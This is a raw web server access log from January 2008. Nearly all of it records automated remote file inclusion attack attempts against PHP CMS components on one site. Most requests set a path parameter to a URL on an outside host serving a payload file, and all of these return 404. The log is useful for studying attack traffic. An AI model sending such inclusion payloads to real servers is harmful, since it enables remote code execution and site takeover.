207.44.246.45 - - [25/Jan/2008:04:12:43 -0800] "GET /scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:12:44 -0800] "GET /scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:12:48 -0800] "GET /logs/scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:12:49 -0800] "GET /logs/scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:04:13:48 -0800] "GET /logs/access_071225.log//skin/zero_vote/login.php?dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:04:13:48 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:04:13:49 -0800] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:04:13:59 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:14:32 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:14:32 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:14:33 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:14:33 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
212.227.101.9 - - [25/Jan/2008:04:15:16 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.227.101.9 - - [25/Jan/2008:04:15:16 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.227.101.9 - - [25/Jan/2008:04:15:16 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
212.227.101.9 - - [25/Jan/2008:04:15:16 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:04:15:26 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:15:44 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:04:16:14 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:04:16:14 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:04:16:15 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:04:16:22 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:04:16:22 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:04:16:22 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:04:16:22 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:16:25 -0800] "GET /logs/access_071225.log//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.54.86.100 - - [25/Jan/2008:04:16:54 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
86.54.86.100 - - [25/Jan/2008:04:16:54 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:17:29 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:17:30 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:17:49 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:17:55 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:04:17:57 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:04:17:57 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:04:18:01 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:04:18:01 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:02 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:02 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:02 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:02 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:42 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:18:42 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:04:19:02 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:04:19:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:04:19:03 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:04:19:03 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:27 -0800] "GET /logs/access_071229.log/include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:28 -0800] "GET /include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:29 -0800] "GET /logs/access_071229.log//include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:30 -0800] "GET /logs/include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:32 -0800] "GET //include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:19:33 -0800] "GET /logs//include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:19:57 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:19:57 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:19:58 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:19:58 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:21:41 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:21:41 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:21:48 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:21:49 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:22:38 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:22:38 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:22:39 -0800] "GET /logs/access_071225.log//include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:22:51 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:22:58 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:23:00 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:23:01 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:23:15 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:23:15 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.117.252.28 - - [25/Jan/2008:04:23:16 -0800] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.252.28 - - [25/Jan/2008:04:23:16 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.252.28 - - [25/Jan/2008:04:23:16 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:23:20 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:23:20 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:04:23:29 -0800] "GET /logs/access_071225.log/include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:23:30 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:23:30 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.117.252.28 - - [25/Jan/2008:04:24:04 -0800] "GET /logs/access_071105.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:24:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:24:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:24:38 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:24:38 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.28.79 - - [25/Jan/2008:04:25:05 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.70.113.10 - - [25/Jan/2008:04:25:52 -0800] "GET /logs/access_071229.log//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [25/Jan/2008:04:25:53 -0800] "GET //include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [25/Jan/2008:04:25:54 -0800] "GET /logs//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:04:26:37 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:04:26:37 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:04:28:30 -0800] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:04:28:30 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:04:28:31 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.127.2.93 - - [25/Jan/2008:04:28:32 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.127.2.93 - - [25/Jan/2008:04:28:33 -0800] "GET /logs//login.php?dir=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:04:28:35 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:04:29:47 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:04:29:49 -0800] "GET /logs/access_071105.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:30:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:30:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:30:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:30:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
